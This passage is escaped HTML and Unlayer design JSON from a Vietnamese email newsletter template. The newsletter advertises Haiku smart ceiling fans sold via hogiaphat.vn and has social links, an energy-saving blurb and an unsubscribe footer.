0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:40px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1678764058271-br-code-app.jpg\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 220px;\\\" width=\\\"220\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: #000000\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: #000000;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 1px solid #BBBBBB;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 20px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<div align=\\\"center\\\">\\r\\n  <div style=\\\"display: table; max-width:147px;\\\">\\r\\n  <!--[if (mso)|(IE)]><table width=\\\"147\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"border-collapse:collapse;\\\" align=\\\"center\\\"><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"border-collapse:collapse; mso-table-lspace: 0pt;mso-table-rspace: 0pt; width:147px;\\\"><tr><![endif]-->\\r\\n  \\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 5px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 5px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/facebook.com\\/\\\" title=\\\"Facebook\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/circle-black\\/facebook.png\\\" alt=\\\"Facebook\\\" title=\\\"Facebook\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 5px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 5px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/pinterest.com\\/\\\" title=\\\"Pinterest\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/circle-black\\/pinterest.png\\\" alt=\\\"Pinterest\\\" title=\\\"Pinterest\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 5px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 5px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/linkedin.com\\/\\\" title=\\\"LinkedIn\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/circle-black\\/linkedin.png\\\" alt=\\\"LinkedIn\\\" title=\\\"LinkedIn\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 0px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/twitter.com\\/\\\" title=\\\"Twitter\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/circle-black\\/twitter.png\\\" alt=\\\"Twitter\\\" title=\\\"Twitter\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    \\r\\n    <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_35\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 15px 20px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #f5f5f5; line-height: 160%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 160%;\\\">Xu h\\u01b0\\u1edbng l\\u00e0m m\\u00e1t ti\\u1ebft ki\\u1ec7m \\u0111i\\u1ec7n v\\u00e0 ph\\u00f9 h\\u1ee3p v\\u1edbi ki\\u1ebfn tr\\u00fac kh\\u00f4ng gian n\\u1ed9i th\\u1ea5t nh\\u00e0 \\u1edf Vi\\u1ec7t Nam. S\\u1eed d\\u1ee5ng qu\\u1ea1t tr\\u1ea7n s\\u1ebd gi\\u00fap b\\u1ea1n ti\\u1ebft ki\\u1ec7m \\u0111i\\u1ec7n chi phi ti\\u1ec1n \\u0111i\\u1ec7n h\\u00e0ng th\\u00e1ng. V\\u00e0o m\\u00f9a h\\u00e8 qu\\u1ea1t tr\\u1ea7n k\\u1ebft h\\u1ee3p v\\u1edbi \\u0111i\\u1ec1u ho\\u00e0 kh\\u00f4ng kh\\u00ed b\\u1ea1n s\\u1ebd t\\u0103ng th\\u00eam 2-5 \\u0111\\u1ed9 C, m\\u1ed7i \\u0111\\u1ed9 C b\\u1ea1n t\\u0103ng t\\u1eeb h\\u1ec7 th\\u1ed1ng \\u0111i\\u1ec1u ho\\u00e0 s\\u1ebd ti\\u1ebft ki\\u1ec7m 5% chi ph\\u00ed \\u0111i\\u1ec7n h\\u00e0ng th\\u00e1ng.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_36\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 22px 20px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #ced4d9; line-height: 170%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 170%;\\\"><span style=\\\"font-size: 12px; line-height: 20.4px;\\\">\\u00a9 Tổ chức đào tạo WIT Technology | All Rights Reserve.\\u00a0<\\/span><\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 170%;\\\"><span style=\\\"font-size: 12px; line-height: 20.4px;\\\"><a rel=\\\"noopener\\\" href=\\\"https:\\/\\/hogiaphat.vn\\/lien-he\\\" target=\\\"_blank\\\"><span style=\\\"text-decoration: underline; line-height: 20.4px; font-size: 12px;\\\">Unsubscribe<\\/span><\\/a>\\u00a0 here<\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n    <!--[if (mso)|(IE)]><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n  <\\/tbody>\\r\\n  <\\/table>\\r\\n  <!--[if mso]><\\/div><![endif]-->\\r\\n  <!--[if IE]><\\/div><![endif]-->\\r\\n<\\/body>\\r\\n\\r\\n<\\/html>\\r\\n\"', '\"{\\\"counters\\\":{\\\"u_row\\\":25,\\\"u_column\\\":36,\\\"u_content_menu\\\":2,\\\"u_content_text\\\":38,\\\"u_content_image\\\":16,\\\"u_content_timer\\\":1,\\\"u_content_button\\\":15,\\\"u_content_social\\\":2,\\\"u_content_divider\\\":7,\\\"u_content_text_deprecated\\\":20,\\\"u_content_heading\\\":4},\\\"body\\\":{\\\"id\\\":\\\"GV18HJ58oe\\\",\\\"rows\\\":[{\\\"id\\\":\\\"-j-7JbtKQX\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"8mzvqBlV3y\\\",\\\"contents\\\":[{\\\"id\\\":\\\"4mcWZHmjh6\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"20px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1678765403006-LOGO.png\\\",\\\"width\\\":2256,\\\"height\\\":296},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_1\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_1\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#111416\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_1\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"S5aKfBqVYk\\\",\\\"cells\\\":[1,1],\\\"columns\\\":[{\\\"id\\\":\\\"_n240XDaNA\\\",\\\"contents\\\":[{\\\"id\\\":\\\"Mkpj_fE_gW\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"5px 0px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1678765991818-Haiku-I.jpg\\\",\\\"width\\\":600,\\\"height\\\":452},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_2\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_2\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}},{\\\"id\\\":\\\"qQIDckHbBm\\\",\\\"contents\\\":[{\\\"id\\\":\\\"jg_Z79Uyn_\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"5px 10px 10px 30px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#f1c40f\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_1\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\">HAIKU - Qu\\u1ea1t tr\\u1ea7n cao c\\u1ea5p \\u0111\\u01b0\\u1ee3c thi\\u1ebft k\\u1ebf v\\u00e0 s\\u1ea3n xu\\u1ea5t t\\u1ea1i Hoa K\\u1ef3.<\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"XwSLnWhGTN\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 10px 30px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#ffffff\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_2\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 18px; line-height: 25.2px;\\\\\\\"><strong>QU\\u1ea0T TR\\u1ea6N TH\\u00d4NG MINH<\\/strong><\\/span><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"RayghVoigS\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 30px 40px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#ced4d9\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"160%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_5\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 160%;\\\\\\\">V\\u1edbi ch\\u1ebf \\u0111\\u1ed9 Haiku Fan-Eco mang l\\u1ea1i hi\\u1ec7u qu\\u1ea3 h\\u00e0ng \\u0111\\u1ea7u th\\u1ebf gi\\u1edbi nh\\u1edd s\\u1ef1 ti\\u1ec7n l\\u1ee3i c\\u1ee7a thi\\u1ebft b\\u1ecb di \\u0111\\u1ed9ng c\\u1ee7a b\\u1ea1n. Fan Eco mang \\u0111\\u1ebfn kh\\u1ea3 n\\u0103ng ti\\u1ebft ki\\u1ec7m n\\u0103ng l\\u01b0\\u1ee3ng ch\\u01b0a t\\u1eebng c\\u00f3 v\\u1edbi lu\\u1ed3ng kh\\u00f4ng kh\\u00ed l\\u00e0m m\\u00e1t h\\u00e0i h\\u00f2a v\\u00e0 ho\\u00e0n h\\u1ea3o.<\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"IRQURjJVkF\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 10px 30px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-haiku\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#db1908\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"8px 25px 8px 24px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_1\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"line-height: 16.8px;\\\\\\\">XEM TH\\u00caM<\\/span>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":120,\\\"calculatedHeight\\\":33}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_3\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#111416\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_2\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"_PZZhYOQZ7\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"yOpq-jE4C5\\\",\\\"contents\\\":[{\\\"id\\\":\\\"2yWUSplc9A\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1678768028416-haiku-bg_optimized.png\\\",\\\"width\\\":1200,\\\"height\\\":593},\\\"textAlig